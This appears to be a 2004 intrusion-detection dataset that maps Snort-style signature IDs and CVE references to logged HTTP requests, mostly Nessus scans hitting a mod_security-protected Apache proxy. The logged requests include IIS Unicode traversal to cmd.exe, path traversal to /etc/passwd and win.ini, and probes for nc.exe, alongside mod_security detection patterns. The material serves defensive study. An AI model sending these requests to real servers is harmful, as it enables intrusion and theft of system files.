chunked |
977 | | web-application-activity | WEB-IIS .cnf access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:53 2004] "GET /_vti_pvt%5caccess.cnf HTTP/1.1" 403 303 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/_vti_pvt\access.cnf ---------------------------------------- GET /_vti_pvt%5caccess.cnf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
981 | CVE-2000-0884 | web-application-attack | WEB-IIS unicode directory traversal attempt | Request: 68.48.142.117 - - [Tue Mar 9 22:41:41 2004] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 Handler: (null) Error: mod_security: Invalid character detected [192] ---------------------------------------- GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 Connnection: close Host: www mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1 |
982 | CVE-2000-0884 | web-application-attack | WEB-IIS unicode directory traversal attempt | Request: 68.48.142.117 - - [Tue Mar 9 22:41:34 2004] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 Handler: (null) Error: mod_security: Invalid character detected [193] ---------------------------------------- GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 Connnection: close Host: www mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1 |
983 | CVE-2000-0884 | web-application-attack | WEB-IIS unicode directory traversal attempt | Request: 68.48.142.117 - - [Tue Mar 9 22:41:42 2004] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 Handler: (null) Error: mod_security: Invalid character detected [193] ---------------------------------------- GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 Connnection: close Host: www mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1 |
987 | CVE-2000-0630 | web-application-activity | WEB-IIS .htr access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:44 2004] "GET /NULL.htr HTTP/1.1" 404 288 Handler: (null) Error: mod_security: Warning. Pattern match "\.htr" at THE_REQUEST. ---------------------------------------- GET /NULL.htr HTTP/1.1 Host: www.testproxy.net mod_security-message: Warning. Pattern match "\.htr" at THE_REQUEST. HTTP/1.1 404 Not Found Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
989 | | web-application-activity | WEB-IIS Unicode2.pl script (File permission canonicalization) | Request: 217.160.165.173 - - [Fri Mar 12 22:45:51 2004] "GET /scripts/sensepost.exe?/c+dir+c:\+/OG HTTP/1.1" 403 305 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/scripts ---------------------------------------- GET /scripts/sensepost.exe?/c+dir+c:\+/OG HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=82 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
990 | | web-application-activity | WEB-IIS _vti_inf access | Request: 217.160.165.173 - - [Fri Mar 12 22:43:55 2004] "GET /_vti_inf.html HTTP/1.1" 404 293 Handler: (null) Error: mod_security: Warning. Pattern match "_vti_inf\.html" at THE_REQUEST. ---------------------------------------- GET /_vti_inf.html HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "_vti_inf\.html" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
993 | | web-application-attack | WEB-IIS iisadmin access | Request: 217.160.165.173 - - [Fri Mar 12 22:40:10 2004] "GET /iisadmin/ HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/iisadmin/] for 50000 ms ---------------------------------------- GET /iisadmin/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/iisadmin" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
995 | BID189 CVE-2000-0630 | web-application-attack | WEB-IIS ism.dll access | Request: 24.127.175.68 - - [Sat Mar 13 14:41:32 2004] "GET http://brazilian-transsexuals.com/members//scripts/iisadmin/ism.dll?http/dir;dunno;RainM; HTTP/1.0" 200 566 Handler: proxy-server Error: mod_security: pausing [http://brazilian-transsexuals.com/members//scripts/iisadmin/ism.dll?http/dir;dunno;RainM;] for 50000 ms ---------------------------------------- GET http://brazilian-transsexuals.com/members//scripts/iisadmin/ism.dll?http/dir;dunno;RainM; HTTP/1.0 Cache-Control: no-cache Connection: close Host: brazilian-transsexuals.com Pragma: no-cache Proxy-Connection: keep-alive Referer: http://brazilian-transsexuals.com/members//scripts/iisadmin/ism.dll?http/dir;dunno;RainM; User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) mod_security-message: Access denied with code 200. Pattern match "/scripts/iisadmin/ism\.dll\?http/dir" at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1 |
997 | | web-application-attack | WEB-IIS asp-dot attempt | Request: 218.72.187.112 - - [Sat Mar 13 09:13:48 2004] "GET http://pagead2.googlesyndication.com/pagead/ads?client=ca-pub-5160265213986229&random=1079126391580&lmt=1079124085&format=120x600_as&output=html&url=http%3A%2F%2Fwww.spord.com%2Fexpiringdomains.asp.htm&color_bg=FFFFFF&color_text=000000&color_link=0000FF&color_url=008000&color_border=336699 HTTP/1.0" 200 566 Handler: proxy-server Error: mod_security: pausing [http://pagead2.googlesyndication.com/pagead/ads?client=ca-pub-5160265213986229&random=1079126391580&lmt=1079124085&format=120x600_as&output=html&url=http%3A%2F%2Fwww.spord.com%2Fexpiringdomains.asp.htm&color_bg=FFFFFF&color_text=000000&color_link=0000FF&color_url=008000&color_border=336699] for 50000 ms ---------------------------------------- GET http://pagead2.googlesyndication.com/pagead/ads?client=ca-pub-5160265213986229&random=1079126391580&lmt=1079124085&format=120x600_as&output=html&url=http%3A%2F%2Fwww.spord.com%2Fexpiringdomains.asp.htm&color_bg=FFFFFF&color_text=000000&color_link=0000FF&color_url=008000&color_border=336699 HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/msword, */* Accept-Language: en Connection: Keep-Alive Host: pagead2.googlesyndication.com Referer: http://www.spord.com/expiringdomains.asp.htm User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98) mod_security-message: Access denied with code 200. Pattern match "\.asp\." at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1 |
1001 | BID2126 CAN-1999-1069 | attempted-recon | WEB-MISC carbo.dll access | Request: 217.160.165.173 - - [Fri Mar 12 22:42:04 2004] "GET /cgi-bin/carbo.dll?icatcommand=..\..\..\..\..\..\winnt\win.ini&catalogname=catalog HTTP/1.1" 403 301 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/carbo.dll ---------------------------------------- GET /cgi-bin/carbo.dll?icatcommand=..\..\..\..\..\..\winnt\win.ini&catalogname=catalog HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1002 | | web-application-attack | WEB-IIS cmd.exe access | Request: 68.48.142.117 - - [Tue Mar 9 22:22:57 2004] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 Handler: (null) Error: mod_security: pausing [/c/winnt/system32/cmd.exe] for 50000 ms ---------------------------------------- GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 Connnection: close Host: www mod_security-message: Access denied with code 200. Pattern match "cmd\.exe" at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1 |
1013 | BID2252 | web-application-activity | WEB-IIS fpcount access | Request: 217.160.165.173 - - [Fri Mar 12 22:40:59 2004] "GET /_vti_bin/fpcount.exe HTTP/1.1" 404 300 Handler: (null) Error: mod_security: Warning. Pattern match "/_vti_bin/" at THE_REQUEST. ---------------------------------------- GET /_vti_bin/fpcount.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/fpcount\.exe" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1016 | CVE-2000-0778 Nessus 10491 | web-application-activity | WEB-IIS global.asa access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:13 2004] "GET /global.asa\ HTTP/1.0" 404 279 Handler: (null) Error: mod_security: Warning. Pattern match "/global\.asa" at THE_REQUEST. ---------------------------------------- GET /global.asa\ HTTP/1.0 Translate: f mod_security-message: Warning. Pattern match "/global\.asa" at THE_REQUEST. HTTP/1.0 404 Not Found Connection: close Content-Type: text/html; charset=iso-8859-1 |
1023 | BID529 CVE-1999-1011 | web-application-activity | WEB-IIS msadcs.dll access | Request: 217.160.165.173 - - [Fri Mar 12 22:39:47 2004] "GET /msadc/msadcs.dll HTTP/1.1" 404 296 Handler: (null) Error: mod_security: Warning. Pattern match "/msadcs\.dll" at THE_REQUEST. ---------------------------------------- GET /msadc/msadcs.dll HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/msadcs\.dll" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1024 | CVE-1999-0191 BID1818 | web-application-activity | WEB-IIS newdsn.exe access | Request: 217.160.165.173 - - [Fri Mar 12 22:37:03 2004] "GET /scripts/tools/newdsn.exe HTTP/1.1" 404 304 Handler: (null) Error: mod_security: Warning. Pattern match "/scripts/tools/newdsn\.exe" at THE_REQUEST. ---------------------------------------- GET /scripts/tools/newdsn.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/scripts/tools/newdsn\.exe" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1038 | BID256 | web-application-activity | WEB-IIS site server config access | Request: 24.127.175.68 - - [Sat Mar 13 15:16:43 2004] "GET http://thedomina.com/members/index.html/adsamples/config/site.csc;dunno;RainM; HTTP/1.0" 401 19686 Handler: proxy-server Error: mod_security: Warning. Pattern match "/adsamples/config/site\.csc" at THE_REQUEST. ---------------------------------------- GET http://thedomina.com/members/index.html/adsamples/config/site.csc;dunno;RainM; HTTP/1.0 Cache-Control: no-cache Connection: close Host: thedomina.com Pragma: no-cache Proxy-Connection: keep-alive Referer: http://thedomina.com/members/index.html/adsamples/config/site.csc;dunno;RainM; User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) mod_security-message: Warning. Pattern match "/adsamples/config/site\.csc" at THE_REQUEST. HTTP/1.0 401 Authorization Required Warning: Subject to Monitoring WWW-Authenticate: Basic realm="The Domina - Member Entrance" Last-Modified: Sat, 13 Mar 2004 17:13:55 GMT ETag: "3b852a-4ce6-40534153" Accept-Ranges: bytes Content-Length: 19686 Content-Type: text/html X-Cache: MISS from www.testproxy.net Connection: close |
1051 | BID2156 CVE-2001-0075 | web-application-attack | WEB-CGI technote main.cgi file directory traversal attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:37:09 2004] "GET /technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../etc/passwd HTTP/1.1" 403 301 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/technote ---------------------------------------- GET /technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1054 | BID2527 | web-application-attack | WEB-MISC weblogic view source attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:42:03 2004] "GET /cgi-bin/index.js%70 HTTP/1.1" 404 297 Handler: cgi-script Error: script not found or unable to stat: /usr/local/apache/cgi-bin/index.jsp ---------------------------------------- GET /cgi-bin/index.js%70 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1057 | | web-application-activity | WEB-MISC ftp attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:46:07 2004] "GET /scripts/ftp.exe?/c+-h HTTP/1.1" 404 295 Handler: (null) Error: mod_security: Warning. Pattern match "ftp\.exe" at THE_REQUEST. ---------------------------------------- GET /scripts/ftp.exe?/c+-h HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "ftp\.exe" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=40 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1062 | | web-application-activity | WEB-MISC nc.exe attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:45:55 2004] "GET /scripts/nc.exe?-h HTTP/1.1" 403 298 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/scripts ---------------------------------------- GET /scripts/nc.exe?-h HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=48 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1071 | | web-application-attack | WEB-MISC .htpasswd access | Request: 129.137.161.10 - - [Sat Mar 13 21:31:40 2004] "GET http://www.boygangs.com//.htpasswd.pl HTTP/1.0" 403 308 Handler: proxy-server Error: client denied by server configuration: proxy:http://www.boygangs.com//.htpasswd.pl ---------------------------------------- GET http://www.boygangs.com//.htpasswd.pl HTTP/1.0 Accept: */*, text/html HTTP/1.0 403 Forbidden Connection: close Content-Type: text/html; charset=iso-8859-1 |
1072 | BID2173 CVE-2001-0009 | web-application-attack | WEB-MISC Lotus Domino directory traversal | Request: 217.160.165.173 - - [Fri Mar 12 22:45:38 2004] "GET %00.nsf/../../../../../lotus/domino/notes.ini HTTP/1.1" 404 279 Handler: (null) ---------------------------------------- GET %00.nsf/../../../../../lotus/domino/notes.ini HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1077 | | web-application-activity | WEB-MISC queryhit.htm access | Request: 24.127.175.68 - - [Sat Mar 13 14:46:30 2004] "GET http://gunnerworld.com/members/mainmenu/MEMMENU.html/samples/search/queryhit.htm;dunno;RainM; HTTP/1.0" 401 469 Handler: proxy-server Error: mod_security: Warning. Pattern match "/samples/search/queryhit\.htm" at THE_REQUEST. ---------------------------------------- GET http://gunnerworld.com/members/mainmenu/MEMMENU.html/samples/search/queryhit.htm;dunno;RainM; HTTP/1.0 Cache-Control: no-cache Connection: close Host: gunnerworld.com Pragma: no-cache Proxy-Connection: keep-alive Referer: http://gunnerworld.com/members/mainmenu/MEMMENU.html/samples/search/queryhit.htm;dunno;RainM; User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) mod_security-message: Access denied with code 200. Pattern match "/search" at THE_REQUEST. HTTP/1.0 401 Authorization Required Warning: Subject to Monitoring WWW-Authenticate: Basic realm="Members" Content-Type: text/html; charset=iso-8859-1 X-Cache: MISS from www.testproxy.net Connection: close |
1078 | BID267 | web-application-activity | WEB-MISC counter.exe access | Request: 217.160.165.173 - - [Fri Mar 12 22:46:48 2004] "GET /cgi-bin/counter.exe HTTP/1.1" 404 299 Handler: cgi-script Error: script not found or unable to stat: /usr/local/apache/cgi-bin/counter.exe ---------------------------------------- GET /cgi-bin/counter.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1080 | CVE-2000-1024 BID1868 | web-application-attack | WEB-MISC unify eWave ServletExec upload | Request: 217.160.165.173 - - [Fri Mar 12 22:42:19 2004] "GET /servlet/com.unify.servletexec.UploadServlet HTTP/1.1" 403 327 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/servlet ---------------------------------------- GET /servlet/com.unify.servletexec.UploadServlet HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1088 | CVE-2000-1005 BID1774 | web-application-attack | WEB-CGI eXtropia webstore directory traversal | Request: 217.160.165.173 - - [Fri Mar 12 22:38:27 2004] "GET /cgi-bin/Web_Store/web_store.cgi?page=../../../../../../etc/passwd%00.html HTTP/1.1" 403 315 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/Web_Store ---------------------------------------- GET /cgi-bin/Web_Store/web_store.cgi?page=../../../../../../etc/passwd%00.html HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1096 | BID1720 | web-application-activity | WEB-MISC Talentsoft Web+ internal IP Address access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:50 2004] "GET /cgi-bin/webplus.exe?about HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/webplus.exe ---------------------------------------- GET /cgi-bin/webplus.exe?about HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1106 | BID1431 CAN-2000-0590 | web-application-activity | WEB-CGI Poll-it access | Request: 217.160.165.173 - - [Fri Mar 12 22:40:23 2004] "GET /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00 HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1108 | BID1532 CAN-2000-0760 | attempted-recon | WEB-MISC Tomcat server snoop access | Request: 217.160.165.173 - - [Fri Mar 12 22:40:14 2004] "GET /examples/jsp/snp/anything.snp HTTP/1.1" 403 313 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/examples ---------------------------------------- GET /examples/jsp/snp/anything.snp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1110 | CVE-2000-0628 BID1457 | attempted-recon | WEB-MISC apache source.asp file access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:31 2004] "GET /site/eg/source.asp HTTP/1.1" 403 302 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/site ---------------------------------------- GET /site/eg/source.asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1111 | | attempted-recon | WEB-MISC Tomcat server exploit access | Request: 217.160.165.173 - - [Fri Mar 12 22:39:04 2004] "GET /admin/contextAdmin/contextAdmin.html HTTP/1.1" 403 320 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/admin ---------------------------------------- GET /admin/contextAdmin/contextAdmin.html HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1112 | arachNIDS 298 | attempted-recon | WEB-MISC http directory traversal | Request: 217.160.165.173 - - [Fri Mar 12 22:30:35 2004] "GET ..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1" 400 381 Handler: (null) Error: Invalid URI in request GET ..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1 ---------------------------------------- GET ..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 400 Bad Request Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1113 | arachNIDS 297 | attempted-recon | WEB-MISC http directory traversal | Request: 68.48.142.117 - - [Tue Mar 9 22:45:58 2004] "GET /scripts/..%25%35%63../httpodbc.dll HTTP/1.0" 200 566 Handler: (null) Error: mod_security: pausing [/scripts/..%5c../httpodbc.dll] for 50000 ms ---------------------------------------- GET /scripts/..%25%35%63../httpodbc.dll HTTP/1.0 Connnection: close Host: www mod_security-message: Access denied with code 200. Pattern match "\.\." at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1 |
1122 | | attempted-recon | WEB-MISC /etc/passwd | Request: 217.160.165.173 - - [Fri Mar 12 22:31:14 2004] "GET /PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/PSUser/PSCOErrPage.htm] for 50000 ms ---------------------------------------- GET /PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/etc/passwd" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1125 | CAN-1999-0610 Nessus 10298 | attempted-recon | WEB-MISC webcart access | Request: 217.160.165.173 - - [Fri Mar 12 22:37:45 2004] "GET /webcart/config/ HTTP/1.1" 403 299 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/webcart ---------------------------------------- GET /webcart/config/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1129 | | attempted-recon | WEB-MISC .htaccess access | Request: 217.160.165.173 - - [Fri Mar 12 22:37:51 2004] "GET /.htaccess HTTP/1.1" 403 293 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/.htaccess ---------------------------------------- GET /.htaccess HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
